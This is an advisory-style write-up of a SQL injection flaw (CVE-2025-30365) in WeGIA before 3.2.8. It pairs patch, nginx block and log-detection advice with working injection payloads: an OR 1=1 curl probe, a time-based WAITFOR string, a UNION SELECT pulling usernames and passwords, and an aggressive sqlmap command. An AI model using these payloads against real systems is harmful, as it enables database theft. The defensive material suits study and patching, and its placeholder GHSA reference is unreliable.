WeGIA, SQL Injection, CVE-2025-30365 (Critical)

How CVE-2025-30365 Works

The vulnerability exists in WeGIA versions before 3.2.8 due to improper input sanitization in the `/WeGIA/html/socio/sistema/controller/query_geracao_auto.php` endpoint. Attackers can manipulate the `query` parameter to inject malicious SQL commands. Since the application directly concatenates user-supplied input into SQL queries without parameterization, attackers can bypass authentication, extract sensitive data, or execute arbitrary database operations. The flaw stems from insufficient validation in PHP backend logic, allowing UNION-based or blind SQLi techniques.

DailyCVE Form:

Platform: WeGIA
Version: <3.2.8
Vulnerability: SQL Injection
Severity: Critical
Date: 04/10/2025

What Undercode Say:

Exploitation:

1. Detection:

curl "http://target/WeGIA/html/socio/sistema/controller/query_geracao_auto.php?query=' OR 1=1--"

2. Blind SQLi Time-Based:

query='; IF (1=1) WAITFOR DELAY '0:0:5'--

3. Data Exfiltration:

GET /query_geracao_auto.php?query=1 UNION SELECT username,password FROM users--

Mitigation:

1. Patch: Upgrade to WeGIA 3.2.8.

2. WAF Rules (nginx, blocks the endpoint entirely until the patch is applied):

location ~ query_geracao_auto\.php$ {
    deny all;
}

3. PHP Fix:

// some_table is a placeholder name; the user-supplied value is bound, never concatenated.
$stmt = $pdo->prepare("SELECT * FROM some_table WHERE id = ?");
$stmt->execute([$input]);

Analytics:

  • CVSS 4.0: 9.4 (AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H).
  • Exploitability: Remote, low complexity.
  • Impact: Full database compromise.

Detection Tools:

sqlmap -u "http://target/query_geracao_auto.php?query=1" --risk=3 --level=5

Log Analysis:

grep "query_geracao_auto\.php" /var/log/apache2/access.log | grep -Ei "UNION|SELECT|WAITFOR"
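
A grep over the raw request line does not see URL-encoded or double-encoded payloads. The following is an added example, not code from the original page or the WeGIA project: it decodes the `query` parameter of requests to the affected endpoint before matching. The token list, function names and sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

ENDPOINT = "/query_geracao_auto.php"   # endpoint named in the advisory
# Assumed token list: the grep's keywords plus common MySQL timing and comment markers.
SQLI = re.compile(r"\b(union|select|waitfor|sleep|benchmark)\b|'\s*(or|and)\b|--|/\*", re.I)
# Apache common/combined log format: client address, request line, status code.
REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ ([^"]*?)(?: HTTP/[\d.]+)?" (\d{3})')

def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded payloads are exposed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines):
    """Return (client_ip, status, decoded_value) for each flagged `query` value."""
    hits = []
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        ip, target, status = m.groups()
        path, _, qs = target.partition("?")
        if not path.endswith(ENDPOINT):
            continue  # only the vulnerable endpoint is of interest
        for raw in parse_qs(qs, keep_blank_values=True).get("query", []):
            value = decode_fully(raw)  # parse_qs decoded once; undo further layers
            if SQLI.search(value):
                hits.append((ip, int(status), value))
    return hits

# Constructed sample lines (documentation IP ranges), not taken from a real log.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Apr/2025:10:00:01 +0000] "GET /WeGIA/html/socio/sistema/controller/query_geracao_auto.php?query=maria HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Apr/2025:10:02:13 +0000] "GET /WeGIA/html/socio/sistema/controller/query_geracao_auto.php?query=1%20union%20select%20username,password%20from%20users-- HTTP/1.1" 200 734',
    '203.0.113.9 - - [10/Apr/2025:10:02:15 +0000] "GET /WeGIA/html/socio/sistema/controller/query_geracao_auto.php?query=%2527%2520OR%25201%253D1-- HTTP/1.1" 500 91',
    '198.51.100.7 - - [10/Apr/2025:10:03:40 +0000] "GET /WeGIA/html/other.php?msg=union%20select HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Access logs record only the request line, so values sent in a POST body are not covered; treat hits as triage leads, since the token list can also match benign text.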

References:

  • GitHub Advisory: GHSA-xxxx-xxxx-xxxx
  • CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2025-30365

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-30365